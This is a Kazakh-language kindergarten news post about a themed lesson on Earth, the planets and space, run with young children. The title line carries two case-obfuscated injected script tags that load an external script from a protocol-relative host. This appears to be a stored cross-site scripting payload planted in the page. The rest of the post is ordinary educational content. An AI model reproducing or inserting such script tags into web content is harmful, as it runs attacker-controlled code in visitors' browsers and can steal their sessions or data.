"Жер- біздің үйіміз " тақырыптық тәрбие сағаты<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.04.2025

МКҚК "Ақбота" бөбекжайы "Көбелек" тобының  тәрбиешісі  Ибраева Сая Мукановна балалармен "Жер- біздің үйіміз " тақырыптық тәрбие сағатын өткізді.   Жер, ғарыш,тұңғыш ғарышкер, аспан әлемі суреттерімен әңгіме жүргізді. 

🌍 Біздің Жер – ғарыштағы көптеген планеталардың бірі. Жер Күннің айналасында айналады. Біз күн сайын Күннің жарығы мен жылуын алып отырамыз.

🪐 Ғарышта Жерден басқа да планеталар бар: Меркурий, Шолпан, Марс, Юпитер, Сатурн және басқалар. Әрқайсысының пішіні, түсі, көлемі әртүрлі. Мысалы, Сатурнның айналасында әдемі сақиналар бар, ал Марс – қызыл түсті планета.

🚀 Ғарышқа арнайы зымыранмен ұшуға болады. Ол үшін ғарышкер болу керек. Ғарышкерлер ғарышқа барып, зерттеу жұмыстарын жүргізеді, ғаламның сырын ашады.

⭐ Ғарыш – бұл шексіз әрі таңғажайып әлем! Онда көп жұмбақтар бар, біз оларды біртіндеп үйренеміз,-деп Сая апай балалармен "Ғарыш  кемесі"  суретін бояп,  "Планеталарды тап" дидактикалық ойынымен аяқтады.

Просмотров: 408


Пікір қосу



Деректерді қолтаңбаға қосу